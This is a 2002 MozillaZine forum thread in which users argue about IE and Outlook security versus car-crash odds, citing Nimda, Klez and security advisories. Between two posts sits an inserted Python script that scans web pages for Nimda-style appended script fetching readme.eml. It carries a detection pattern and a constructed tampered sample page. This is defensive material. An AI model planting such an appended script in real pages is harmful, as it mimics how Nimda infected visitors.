It may not sound like much, but the viruses exist. Just because YOU haven't been touched by them doesn't mean that nobody's getting the rough treatment.

Now, statistically someone's chance of getting in a car accident may actually be higher than that of getting a virus or worm or whatever on their computer, but that's only because the occurrence of car accidents is so incredibly high. The equivalent of a small country dies on the road each year, so it's not exactly hard for something to be less of an effect than that.

#33 Re: Not my experience

by kristen

Saturday July 6th, 2002 6:10 AM

Reply to this message

"Now, statistically someone's chance of getting in a car accident may actually be higher than that of getting a virus or worm or whatever on their computer"

Exactly! ;)

#45 Re: Re: Not my experience

by asa <asa@mozilla.org>

Saturday July 6th, 2002 1:16 PM

Reply to this message

Not exactly. Actually, exactly wrong. Your highlighting of that comment only serves to point out your lack of knowledge in these areas.

In the full year of 2000 there were 6,393,140 crashes for 272,690,813 registered drivers. That's a 1 in 42 chance of being involved in a wreck in 1 year or roughly 0.15% of registered drivers involved in a wreck for any given 3 week period. <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html>

Three weeks after discovery Klez, a worm which exposed user data to other users, had infected 7% of PCs worldwide and that's just _one_ worm. Don't forget Melissa, Lovebug, Code Red, Nimda, SirCam and Kournikova. <http://216.239.35.100/sea…ez&hl=en&ie=UTF-8> You can see their live daily stats here <http://wtc.trendmicro.com/wtc/summary.asp>

So in the first three weeks of the Klez epidemic you were about 46 times more likely to be a victim of Klez than be involved in a car wreck. I'd say that your chances of getting a virus or worm on your Windows PC (if you're using Outlook) are considerably higher than being involved in a car wreck. If you've got data to suggest otherwise then please produce it.

According to Computer Economics, in 2001 "Nimda cost companies $635 million in clean-up and lost productivity. The total sum for the various versions of Code Red was $2.62 billion, SirCam leeched $1.15 billion out of corporate coffers, and the unlovely Love Bug cost $8.75 billion to exterminate." <http://www.wired.com/news…ture/0,1377,49681,00.html>

But that's all a bit off-topic except to point out that while getting in a car wreck can be more dangerous or expensive than getting an MS Outlook virus/worm, your chances of getting a virus/worm by using Microsoft Outlook (as it ships on most machines) are pretty good and the costs are non-trivial to individuals and downright expensive for businesses.

It's also worth noting that if you use any email client other than Microsoft's then your chances of running into any of this mess are dramatically (or completely) reduced. There are steps that savvy users of Microsoft's insecure email client can take to protect themselves but most users aren't savvy.

--Asa

#48 Re: Re: Re: Not my experience

by kristen

Saturday July 6th, 2002 7:18 PM

Reply to this message

"There are steps that savvy users of Microsoft's insecure email client can take to protect themselves but most users aren't savvy."

Just like an 'unsavvy' Mozilla user could run an attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble.

I'll be even more clear to sum things up for those that are confused. I keep reading about the 'killer' features of Mozilla. Those being, tabbed browsing and pop-up killing and, of course, security.

Well, when I look at those individually I don't see anything marvelous here.

What is so innovative about opening multiple web documents within the same window? This has existed in a variety of products (both freeware and commercial) for a long time. Pop-Up killing? What is so innovative about that? There are a variety of products, again both freeware and commercial, that can do the same thing, and much more actually.

Finally, the security. Although everything has shifted now to email security (and that's ok with me) what has anyone said regarding browser security as I replied to arielb about? Email is different, it is targeted. I can send an email to you but I can't force you to view a web page. No one at all has offered anything regarding a web page exploiting a reported 'IE hole' and compromising their security. Plenty of people bash IE for this but no one can substantiate it with real world data.

Ok, back to the email. People keep pointing out these top reported worms that require a user to execute an attachment. My point was, and still is, that the attachment could just have easily been an executable that read an ns4, mozilla, etc address book (under windows, mac, linux, etc), include its own smtp engine, and appropriately wreak havoc. No one has said a single thing that would inspire me to run off and use Mozilla Mail.

What's kinda funny is that you're talking about the security of a product that in some ways doesn't exist as far as end users are concerned. For testing purposes only. ;)

#53 Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Saturday July 6th, 2002 9:12 PM

Reply to this message

"Just like an 'unsavvy' Mozilla user could run an attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble."

Launching an executable is a far cry from opening an email. A client which allows a user to be exploited by the simple act of opening an email is a dangerous and insecure tool. As it has been stated here several times, no launching of anything, just reading a mail in Outlook is all that's required. Given two clients, one where opening a mail doesn't allow an attacker to exploit you and one where opening a mail does allow an attacker to exploit you, I think it's reasonable to say one is more secure than the other. Feel free to disagree with that but it isn't very strong ground from which to argue.

--Asa

#54 Re: Re: Re: Re: Re: Not my experience

by kristen

Saturday July 6th, 2002 10:12 PM

Reply to this message

"Launching an executable is a far cry from opening an email."

That's certainly true. It's also a far cry from the 'viri' that are repeatedly cited in the OE bashing quest, namely, ILOVEYOU, Melissa, and W32.Klez. All of which require the user to execute an attachment.

"A client which allows a user to be exploited by the simple act of opening an email is a dangerous and insecure tool."

Sure does sound like it. My question is: Where is it? After reading about HELP.Dropper and all of its 'if, maybes, and possiblies' who has been affected by this and where? Why hasn't this so-called dangerous beast of a thing made the charts like 'user must execute attachment' ones? All a google search turns up of 'HELP.Dropper' is a series of links quoting the same original article. Surely, a delivery mechanism that only requires a user to open an email (with scripting, activex, etc. completely disabled) would be topping the charts left and right!!

Is this the best that can be had here? I'm sure that several here, like tuxracer, are digging around like crazy to find something, anything, to justify the incessant IE/OE security bashing that takes place within the mozilla community as a sales pitch as to why I (or anyone else) should switch.

Not only can no one provide any real-world information regarding websites exploiting IE security holes to compromise a user's system, the best that can be had so far is some obscure 'exploit' that sounds like the most dangerous and effective thing in the world yet is reported nowhere, other than the same initial 'report' being quoted several times over.

Some people really need to pull their heads out of the sand boxes. This whole IE/OE security thing is not as cut and dry as many here would like others to believe. Although I was never expecting to receive any nominations for a 'Mozillian of the Year' award, it has all been rather interesting, educational, and albeit, not surprising. ;)

#55 Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 12:35 AM

Reply to this message

I guess we agree to disagree then. You're not going to convince me that Outlook or IE are doing more to protect my data and the integrity of my system than Mozilla and I'm not going to convince you that the threat is significant enough to warrant precaution.

--Asa

#56 Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 12:55 AM

Reply to this message

"I guess we agree to disagree then"

Agreed.

The only thing is -> That I'm not evangelizing anything. ;)

#61 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 9:45 AM

Reply to this message

"The only thing is -> That I'm not evangelizing anything. ;)"

Yes, you are ;) To deny that is silly. You're evangelizing a position that there are no real threats to computer users and therefore no one needs to take further precautions to secure their data. You're clearly evangelizing and to claim otherwise is disingenuous. You've said basically that Joe Blow's chances of getting in a car wreck is very slim so why use a seatbelt and why discourage drunk driving. I'm evangelizing the position that any threat, however slim the chances of materialization, is worth defending against when the consequences are this extreme. There are a number of defenses against being attacked and one of the most practical is to use software which is both more secure and which is being targeted less. I'm evangelizing the position that being killed or maimed in a car wreck is sufficiently horrible that even though Joe Blow's chances of being the victim of such bad fortune are slim that he should wear a seatbelt and avoid drinking and driving.

--Asa

#74 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 5:20 PM

Reply to this message

"Yes, you are ;) To deny that is silly. You're evangelizing a position that there are no real threats to computer users and therefore no one needs to take further precautions to secure their data."

I guess I'm silly then. ;) I told a single person who was distressed with downloading security updates for IE that if he/she was that bothered by it that he/she should take comfort in the fact that they are more likely to get killed in a car wreck (several times over) than to come across a web site that compromises their security.

No one has said a single thing to refute this. I'll give you a hint as to why -> Because you can't. ;)

#76 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Sunday July 7th, 2002 8:06 PM

Reply to this message

You did considerably more than tell a single distressed person. You posted nearly a dozen comments all suggesting that people were overly concerned about security.

I can't point you to a single site that compromises your security. That's not the point. The point is that there is a better chance of being a victim if you're using insecure software like Outlook or IE.

If security isn't really a problem, like you suggest, then to what do you attribute the estimated $1.6 trillion that security attacks, virus and worm attacks, and associated downtime cost in 2001 <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> . $2.6 billion for cleanup of RedWorm alone doesn't seem like a non-issue to me <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> . If security isn't a problem then why are corporations predicted to up their computer security budgets from 0.4% of revenue to 4% of revenue in less than a decade <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> ? Individuals and companies spending $4.8 billion a year on security software because their application and OS software is full of holes doesn't seem like a non-problem to me <http://techupdate.zdnet.c…n/0,14179,2845627,00.html> . You can find more good reading on the costs and difficulties of setting up and maintaining a secure computing environment at <http://edtn.bitpipe.com/data/rlist?t=soft_10_136_2> .

"should take comfort in the fact that they are more likely to get killed in a car wreck (several times over) than to come across a web site that compromises their security."

Even if you've got statistics to back that up (did you post something and I missed it?) that's just not the point. I can't point you to a location where you are guaranteed to be involved in a car wreck but that shouldn't stop you from taking precautions like wearing a seat belt and not driving a vehicle drunk (or one which has a good chance of rolling over if you take evasive action).

Computers are attacked. Data is stolen or otherwise compromised. Computing is disrupted, bandwidth is lost and systems are destabilized by virus, worm and DOS attacks. To deny these facts is as silly as to deny that tens of thousands of people are killed each year in automobile accidents. Taking steps to avoid being a victim sounds like reasonable behavior to me.

--Asa

#81 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by kristen

Sunday July 7th, 2002 9:31 PM

Reply to this message

"You did considerably more than tell a single distressed person."

Yes, I've had to explain to several others as to why I said that.

"I can't point you to a single site that compromises your security. That's not the point."

That is the point. And thanks for help making it. ;)

"Computers are attacked. Data is stolen or otherwise compromised. Computing is disrupted, bandwidth is lost and systems are destabilized by virus, worm and DOS attacks."

No argument there. ;)

#83 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Sunday July 7th, 2002 10:03 PM

Reply to this message

"That is the point. And thanks for help making it. ;) "

That a site could appear any day, or already exists and is exploiting users without my personal and specific knowledge supports your position that there are no threats to user systems and user data on the web?

"No argument there. ;)"

So you agree that there are risks to data security and system integrity on the web and in email?

(If we keep this going for another round or two the post title will be nothing but Re:Re:Re:Re...)

--Asa

#90 Re: No

by kristen

Monday July 8th, 2002 5:44 PM

Reply to this message

"That a site could appear any day, or already exists and is exploiting users without my personal and specific knowledge supports your position that there are no threats to user systems and user data on the web?"

Of course not. That never was my position. My position was that arielb is more likely to get killed in a car wreck several times over than to visit a web page that compromises his or her security.

"So you agree that there are risks to data security and system integrity on the web and in email?"

Yes, of course. The thing is I still don't see anything significant regarding web browsing.

"(If we keep this going for another round or two the post title will be nothing but Re:Re:Re:Re...)"

Ok. ;) I trimmed. Sorry about that.

#105 Re: tuxracer's comparison

by tuxracer

Tuesday July 9th, 2002 10:00 AM

Reply to this message

"My position was that arielb is more likely to get killed in a car wreck several times over than to visit a web page that compromises his or her security."

Wrong: <http://www.mozillazine.or…le=2329&message=45#45>

#87 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:35 AM

Reply to this message

> "I can't point you to a single site that compromises your security. That's not the point."
>
> That is the point. And thanks for help making it. ;)

If it is a point, then it is a moot point. The fact is that whenever a website that would compromise someone's security is discovered, it is shut down. If everyone ignored malicious websites and allowed them to stay active on the net then the cost of the damage would be astronomical (as if it were not high enough already). You are indeed very silly (perhaps another word would be better) if you honestly believe that the fact that we have not produced a list of sites that compromise your security somehow validates your lackadaisical attitude regarding Internet security.

In the past year I have shut down or forced the cleanup of over 100 websites infected with Nimda; if I were to discover a website that used the Help.Dropper method or the buffer overrun method of compromising someone's security, getting it shut down or cleaned up would be a top priority for me; coming to this forum and posting the URL would be the very last thing that I would do -- actually I would probably never post the URL here.

#92 Re: No

by kristen

Monday July 8th, 2002 8:11 PM

Reply to this message

"You are indeed very silly (perhaps another word would be better) if you honestly believe that the fact that we have not produced a list of sites that compromise your security"

I guess I'm silly. ;) What has not been produced are cases of widespread security issues involving web browsing. The pillar that everyone here is falling on falls back to email in one form or another. I admit, I am partially to blame for that since I let the topic deviate from my initial comment to arielb and fueled it even more.

Besides personal experience which I know doesn't amount to much in the grand scheme of things, I have searched and searched and searched for cases of where as a result of web browsing has caused anything close to a security hazard. All I read (including the links people have posted here) are things whose main propagation was via email.

As a result, this doesn't convince me in the least to admit error, or retract my statement to arielb, that he or she is more likely to get killed in a car wreck several times over than to come across a web page that compromises his or her security.

Back to email. So, I should use Mozilla Mail then if I don't use av software and I run an unpatched version of OE? The rationale being that because it happened before it will happen again? Was I not supposed to use Netscape 3.0 because Netscape 2.0 submitted my real email address to ftp sites I visited? Was I not supposed to use a newer version of netscape4 because an older version of netscape4 had a security hole (of which there have been many in the communicator line)? Would whoever not use sendmail because older versions allowed one to breach a security hole within sendmail to fake their IP address? What about Apache? What about, etc. etc.??? What about all sorts of software that have had security issues? Are you suggesting that security is a Microsoft only thing? Or an OE only thing?

From where I am sitting it seems that all sorts of networking software (created by humans) has had issues in one form or the other, we just hear about the ones that affect the most popular and widely used packages is all.

#93 Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 9:38 PM

Reply to this message

If you'll re-read my last post above you'll see that NIMDA was both an email and browser exploit (the email exploit was actually a browser security issue and delivered its payload via a security hole in IE which displays html email for outlook). The exploit came in the form of emails _and_ webpages. If you got NIMDA then there's a decent chance you got it from an infected webpage.

--Asa

#95 Re: Re: Re: No

by kristen

Monday July 8th, 2002 9:56 PM

Reply to this message

"If you'll re-read my last post above you'll see that NIMDA was both an email and browser exploit"

I did read about NIMDA. I've read several articles about NIMDA and its overwhelming propagation came from that of email, not web browsing.

#98 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:16 PM

Reply to this message

With millions of infections, even a small percentage by webpage can add up to a lot. I couldn't find any numbers on the percentage that were emailed and that were webpages (got a URL for me?) but the point still stands that it did spread via webpages enough for that to be included in every security bulletin I could find on NIMDA and even where it was spread by email it was the same mechanism (a hole in IE) as was used in the exploit.

--Asa

#103 Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Tuesday July 9th, 2002 3:56 AM

> "If you'll re-read my last post above you'll see
> that NIMDA was both an email and browser exploit"
>
> I did read about NIMDA. I've read several articles
> about NIMDA and its overwhelming propagation came
> from that of email, not web browsing.

What exactly are you basing that claim on? I am not aware of any factual study conducted to trace the propagation of NIMDA; I would think that that would be a nearly impossible task without pervasive access to thousands of companies' servers and workstations.

As I mentioned in a previous post, I have personally dealt with over 100 NIMDA infected websites. What I did not mention was that the reason that I have dealt with so many is because I have worked with 3 different companies whose networks were brought to their knees by NIMDA and we had to spend a lot of time getting them clean. During the process we tracked NIMDA back to websites and email. One of the companies called me in after they had been infected for the second time; the first time they cleaned all their systems and upgraded their mail server's antivirus software so that it would stop NIMDA infected email; they could not understand how they got infected the second time because they had ignored the fact that NIMDA could spread through web browsing and file sharing. In almost every case, the individual users at these companies had no clue whether they were infected by mail, web, or file share; if asked they would probably say email because they believe, like you apparently do, that worms only get spread by email.

#94 Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 9:41 PM

From where you're sitting all sorts of software has problems so using the software with the most problems and the most people attacking it is better than using software with the fewest problems and the fewest people attacking it?

--Asa

#96 Re: Re: Re: No

by kristen

Monday July 8th, 2002 10:01 PM

"From where you're sitting all sorts of software has problems so using the software with the most problems and the most people attacking it is better than using software with the fewest problems and the fewest people attacking it?"

Let me get this straight then. We should all use what isn't used much in order to best protect ourselves? I'm detecting a catch-22 in this. ;)

How about some sensible user education, use of av software, and maybe even firewalls instead? Maybe even better server side protection? I don't believe there is a product in the world that can replace all of that.

#99 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:29 PM

"Let me get this straight then. We should all use what isn't used much in order to best protect ourselves? I'm detecting a catch-22 in this. ;) "

Given a choice between a lesser used product with fewer holes and a more well known product with lots of holes I'll take the lesser known one and recommend others do the same, especially when the feature sets are comparable. If the balance ever shifts and as user base grows it becomes more of a danger than an alternative with comparable features then maybe I'll move to some other app and recommend others do the same. I don't think that's the whole of it though. That it isn't used as much isn't the only reason that it isn't as susceptible to attack. It's fundamentally more secure. It was designed with security in the foundation, not tacked on as an afterthought (my opinion). I believe that given equal marketshare and equal contempt from crackers and other doers of malice that Mozilla would still be less susceptible to attack than IE.

"How about some sensible user education, use of av software, and maybe even firewalls instead? Maybe even better server side protection? I don't believe there is a product in the world that can replace all of that. "

Probably a good idea. Is my mom going to get much more of an education, purchase and install and then keep up to date an AV app to protect her free web browser, purchase, install and configure a firewall (or pay others to), demand better server-side protection from her ISP? I doubt it. Maybe she'll install some AV software. She'd do well to do everything you suggest because she does have mounds of proprietary and valuable data on her PCs (she runs a small publishing house). Doing all of those things would be good. Doing even some of those things would be good because if you have valuable data on your systems or you can't afford disk-full downtime or lost bandwidth or DOS attacks, then everything you can do to protect yourself is good. Everything including replacing insecure client apps like IE and Outlook.

--Asa (have we hit 100 comments yet?) :)

#100 100th Comment

by AlexBishop <alex@mozillazine.org>

Monday July 8th, 2002 10:44 PM

> (have we hit 100 comments yet?) :)

We have now.

Alex

#101 Re: 100th Comment

by kristen

Monday July 8th, 2002 11:17 PM

"We have now."

Sheesh, you beat me to the punch! ;)

#102 Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 12:11 AM

"Everything including replacing insecure client apps like IE and Outlook."

The key operative here being 'and'. ;)

Can you tell me if I were to browse the web with IE yet use, let's say Pegasus, as my email client what the odds/risk would be to me that I came across a web site that compromised my security? 1 in 10? 1 in 1,000? 1 in 1,000,000? Or perhaps somewhere along the lines of being killed in a car wreck several times over?

Ok, I think this makes 102. ;)

#106 Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 10:20 AM

IE and Outlook are both considerably more susceptible to virus, worm and exploit attacks than any alternatives. I think I've demonstrated that with strong data in the links I've posted in this thread. Get rid of Outlook and you get rid of some of the danger. Get rid of IE and you get rid of even more (I repeat, especially since many of the exploits in these other MS apps are actually a hole in IE). If you read the accounts posted here <http://www.mozillazine.or…=2329&message=103#103> you'll see that IE played a role in the spread of NIMDA. I'll try again to find some statistics but so far my searching has turned up little. What I can't find is a single warning about NIMDA from credible sources that doesn't mention the danger of being infected by webpages if you're using vulnerable versions of IE. I've consistently tried to provide statistics where available and other data <http://www.mozillazine.or…le=2329&message=45#45> from reliable sources and you continue to manufacture statistics and repeat (or at least imply via questions) these non-facts about how likely a user is to be impacted by the lack of security in his email and browser clients. When you show me some numbers that actually demonstrate that a user is more likely to get killed in a car wreck than to be exploited while web browsing then I'll return to that debate but repeating it over and over doesn't make it reality and the data I've provided at <http://www.mozillazine.or…le=2329&message=45#45> suggests that your guess is far from accurate.

--Asa

#107 Getting rid of IE

by AlexBishop <alex@mozillazine.org>

Tuesday July 9th, 2002 11:41 AM

"Get rid of IE and you get rid of even more (I repeat, especially since many of the exploits in these other MS apps are actually a hole in IE)."

Of course, because Microsoft considers IE to be an essential operating system component, getting rid of it is not an easy task.

Alex

#108 Re: Re: Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 6:58 PM

"I think I've demonstrated that with strong data in the links I've posted in this thread."

Actually, you haven't. All you, and others, have done are cite examples that involved email in one form or another. Everything that has been cited is first described by SARC as 'mass mailing worms' who have payloads of 'large scale emailing'.

It doesn't take a genius or PhD to figure this out. We all know the devastation of email worms such as Melissa and ILOVEYOU even though they required the user to execute an attachment. Now imagine the consequences of something that only requires a person to view the email.

The point is, Asa, that you have made no case in refuting my initial statement to arielb. All that is left now is to nit pick over whether a person is more likely to be killed in a car wreck once, twice, five times, ten times, etc.

Ok, 108 I think. ;)

#109 Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 8:33 PM

"All you, and others, have done are cite examples that involved email in one form or another."

Wrong. I cited NIMDA, <http://www.mozillazine.or…le=2329&message=84#84> repeatedly, and estimated financial impact as well as estimated numbers of infections. This was a worm that affected Outlook and IE and didn't require user execution. _It_ _is_ _a_ _worm_ _that_ _affected_ _IE_ _via_ _webpages_ _and_ _doesn't_ _require_ _user_ _execution_.

" Now imagine the consequences of something that only requires a person to view the email."

I don't have to imagine and neither do you. Look it up. Read my post at <http://www.mozillazine.or…le=2329&message=84#84> "NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day (LINK)"

"The point is, Asa, that you have made no case in refuting my initial statement to arielb."

If arielb wants to avoid getting and spreading NIMDA from visiting an infected webpage then applying MS security updates is the next best thing to not using IE. I don't see where that falls short of a refutation.

--Asa

#110 Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 8:55 PM

"Wrong. I cited NIMDA"

That's right, you did cite NIMDA. And just like I said you have cited nothing that didn't involve email in one form or another:

<http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html>

What it boils down to is that you are just somehow hoping to convince me that NIMDA proliferated heavily due to web surfing rather than email. So far, you've done a very poor job. ;)

#111 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 11:29 PM

I'm not trying to convince you that it proliferated heavily due to web surfing. I'm trying to convince you that its spread due to web surfing was non-trivial and treating it as if it was trivial is reckless.

NIMDA proliferated heavily. There are first person accounts in this forum that recall NIMDA spreading via web pages. You're free to discount the security experts and the first person accounts from mozillaZine forum participants but it doesn't seem to be a reasonable position to me.

Cisco says: "Minimizing Damage and Limiting Fallout...# Use netscape as your browser, or disable Javascript on IE, or get IE patched to SP II." <http://www.cisco.com/warp/public/63/nimda.shtml>

CERT says: "This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system." <http://www.cert.org/advisories/CA-2001-26.html>

news.com: " The ability to infect others through viewing a Web page is the Nimda worm's second path of infection. The snippet of JavaScript added to each Web file on an infected server will cause the worm, renamed "readme.eml," to upload from the server to the surfer's computer. The worm will run automatically on PCs using unpatched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On any browser with JavaScript enabled, the worm's script will cause the browser to try to upload the code but will first ask the PC user's permission. PCs can also be infected through the worm's third mode of transmission: e-mail. " (that sounds an awful lot like they put the browser spreading higher in importance than the email spreading) <http://news.com.com/2100-…1-273353.html?legacy=cnet>

ISG says: "Not only does 'Nimda' spread by e-mail and through network shares, it compromises servers in a similar manner to 'Code Red', and can infect users via their web browser - a method not seen with any previous virus. Traditional mail based virus protection is not adequate in protecting your organisation's systems from this virus/ worm." <http://216.239.35.100/sea…er&hl=en&ie=UTF-8>

PCWorld: "Nimda was originally fought using a combination of e-mail and Web filters, antivirus updates, and updates to Microsoft's Internet Explorer Web browser, which is the browser exploited to automatically download the worm." <http://www.pcworld.com/ne…rticle/0,aid,68966,00.asp>

wired: "This worm, named W32/Nimda.A-mm, is dangerously different than virtually all other e-mail and network-borne viruses: It can infect a computer when a user simply clicks on the subject line of an e-mail in an attempt to open it, or visits a Web page housed on an infected server. And many of the infected machines now contain a gaping security hole, created by the worm, that will allow a malicious hacker complete access to the contents of an infected machine or network....Code Red was deemed by the FBI to be so dangerous that it could bring down the entire Internet due to the increased traffic from the scans." <http://www.wired.com/news…logy/0,1282,46944,00.html>

If that's not enough to convince you that this worm infects MS servers and visiting web pages on those servers with a MS browser is dangerous and that there was a real impact due to its spread via web browsers, then I guess we're back to agreeing to disagree.

Do you have experts to refute my experts in their claim that NIMDA spread via web browsers?

--Asa
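
The web-page path described in the CERT and news.com quotes above (script added to served files that makes the browser fetch "readme.eml") is something an administrator can sweep a document root for. The following is an added example, not part of the thread or any poster's code; the `.eml`-reference heuristic, the function names and the sample pages are assumptions constructed for illustration.

```python
import os
import re
from html.parser import HTMLParser

# Heuristic (assumption): a quoted string ending in .eml inside inline script,
# such as the "readme.eml" named in the news.com description.
EML_REF = re.compile(r"""["']([^"']*\.eml)["']""", re.IGNORECASE)
WEB_EXTS = {".html", ".htm", ".asp", ".shtml"}

# Constructed sample pages, not captured from any real server.
CLEAN_PAGE = """<html>
<head><script>document.title = "Home";</script></head>
<body><p>Welcome. Our newsletter is archived as readme.eml.</p></body>
</html>
"""
TAMPERED_PAGE = CLEAN_PAGE + (
    '<html><script language="JavaScript">'
    'window.open("readme.eml")</script></html>\n'
)


class ScriptCollector(HTMLParser):
    """Collect inline scripts and note whether each starts after </html>."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # (line, after_html_close, script_text)
        self._buf = None           # list of text chunks while inside <script>
        self._meta = None
        self._html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._buf = []
            self._meta = (self.getpos()[0], self._html_closed)

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((*self._meta, "".join(self._buf)))
            self._buf = None
        elif tag == "html":
            self._html_closed = True


def scan_html(text):
    """Return one finding per .eml reference found in inline script."""
    parser = ScriptCollector()
    parser.feed(text)
    parser.close()
    findings = []
    for line, trailing, body in parser.scripts:
        for target in EML_REF.findall(body):
            findings.append({
                "line": line,
                "target": target,
                # Script placed after the document's closing tag looks
                # appended by something other than the page author.
                "severity": "high" if trailing else "medium",
            })
    return findings


def scan_tree(root):
    """Walk a document root; report tampered pages and stray .eml files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext == ".eml":
                report[path] = [{"line": 0, "target": name,
                                 "severity": "review"}]
            elif ext in WEB_EXTS:
                # latin-1 never fails to decode, so odd encodings still scan.
                with open(path, encoding="latin-1") as fh:
                    found = scan_html(fh.read())
                if found:
                    report[path] = found
    return report


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(label, scan_html(page))
```

The mention of readme.eml in the clean page's body text is not flagged, because only script content is inspected; a hit means the file should be compared against a known-good copy, not that the server is confirmed infected.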

#112 One addendum

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:24 AM

> If that's not enough to convince you that this worm infects MS servers
> and visiting web pages on those servers with a MS browser is dangerous
> and that there was a real impact due to its spread via web browsers,...

Although MS servers are more susceptible, it is possible for websites on Linux servers to become infected as well via SAMBA file shares between the server and an infected Windows machine; it may also be possible via NFS, but I personally have only seen it happen via SAMBA.

#115 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by kristen

Wednesday July 10th, 2002 1:21 AM

"If that's not enough to convince you that this worm infects MS servers"

I have never disputed that. I'll break it down for you in more simple terms, though.

Let's forget for a moment the exponential growth rate of the email form of NIMDA and focus solely on web surfers who browsed during that period of time with IE. How many are you suggesting became infected with NIMDA via browsing with IE? 25%/50%/100% of all those infected? Whatever number you come up with it is minuscule compared to the number of IE surfers during the same period of time.

The problem is that you want me to believe that it is a very high number. So high, in fact, that it discounts what I said to arielb. The problem is though that you have nothing to convince me otherwise. You can cite 'experts' saying that NIMDA is dangerous, has infected web servers, etc. I don't disagree with that in the least. What I do know is this (and no CNET 'experts' are required to come to this conclusion). I do know that Melissa and ILOVEYOU were extremely contagious due to them sending themselves out to people's address books to gain trust so a recipient would be more likely to execute an attachment. I know that NIMDA is even worse in this regard in that a user doesn't have to manually execute anything. Via some simple common sense I can deduce (again without a CNET 'expert') that if Melissa and ILOVEYOU were so successful then NIMDA would be even more so. I don't need an 'expert' to tell me how and why NIMDA spread so fast. Have you ever wondered how NIMDA would have fared if it didn't infiltrate email? (That was rhetorical) ;)

"then I guess we're back to agreeing to disagree."

That's for sure. ;)

#123 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Wednesday July 10th, 2002 11:47 AM

If webpage infections were even as low as 1% of the total infections (based on the phrasing of the warnings I suspect it was considerably more than this) and we saw as many as 86,000 infections in a single day <http://216.239.35.100/sea…da&hl=en&ie=UTF-8> then given a few weeks of the worm spreading at that rate there could be 20,000 infections via webpage in less than a month. In that same period there'd only be about 3,000 auto deaths.

You said to arielb about the pain of updating for ms security patches: "Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck. "

Disregard the fact that every PC infection of NIMDA via email or webpage was indeed and specifically "because of an IE security hole" (which pretty much destroys your original claim) and just focus on the ones that were via web browser. In order to meet your estimate of being several times less likely than being killed in a car wreck, the percentage of infections via webpage would have to be about 5/100 of 1% of the total infections in that 3 week period. I don't buy that. If it was that little then it wouldn't be featured so prominently in all of the security alerts from CERT and others.

And then there's the point I made above, in direct refutation of your comment to arielb, that _every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. That means that in the height of NIMDA (the one day of 86,000 infections) the probability of your computer being compromised because of an IE security hole was approximately 688 times more likely than being killed in a car wreck. You missed it by several orders of magnitude in the wrong direction.

--Asa

#124 Re: No

by kristen

Wednesday July 10th, 2002 12:57 PM

"You missed it by several orders of magnitude in the wrong direction."

I don't think so. Here is some more simple math.

Calculate, during the whole 1.2 million NIMDA accumulation period, the total number of web pages served to IE clients. Now get that number and divide it into the total number of infected web pages served IE clients for the same period. How about for the past 6 months? The past 2 years? 4 years?

What is the number you arrive at? Again, that was rhetorical, as I can tell you that it is an extremely small number. You don't have to carouse around the Wild Wild Web to find an article at CNET to know this.

The only thing you have demonstrated to me is that there hasn't been any significant type of worm/virus that was spread due to strictly web browsing. The ones you do cite, such as NIMDA and W32.Klez, are also proliferated via email, and they do so in a manner via email even more effective than Melissa and ILOVEYOU. Do you understand this?

